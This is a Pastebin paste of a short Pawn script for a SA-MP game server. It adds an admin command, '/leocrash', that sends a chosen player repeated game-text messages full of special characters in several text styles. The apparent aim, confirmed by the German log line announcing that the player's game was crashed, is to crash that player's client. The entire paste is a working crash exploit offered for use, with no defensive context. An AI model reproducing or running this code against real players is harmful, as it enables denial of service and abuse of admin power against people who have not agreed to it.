Advertisement
Guest User

Untitled

a guest
Dec 4th, 2016
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.16 KB | None | 0 0
  1. CMD:leocrash(playerid,params[])
  2. {
  3. new pID,string[128];
  4. if(playerInfo[playerid][pAdmin] < sizeof(TeamRank)-1) return 0;
  5. if(sscanf(params,"u",pID)) return SendClientMessage(playerid,COLOR_GREY,"Syntax: /leocrash [playerid / Name]");
  6.  
  7. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 1000, 0);
  8. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 2000, 1);
  9. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 3000, 2);
  10. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 4000, 3);
  11. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 5000, 4);
  12. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 6000, 5);
  13. GameTextForPlayer(pID, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 7000, 6);
  14.  
  15. format(string,sizeof(string),"Leo hat das Spiel von %s %s gecrashed.",GetPlayerTitle(pID),GetPlayerNameEx(pID));
  16. SendAdminMessage(COLOR_RED, string, RANK_SUPPORTER);
  17. SendClientMessage(playerid, COLOR_WHITE, string);
  18. return 1;
  19. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement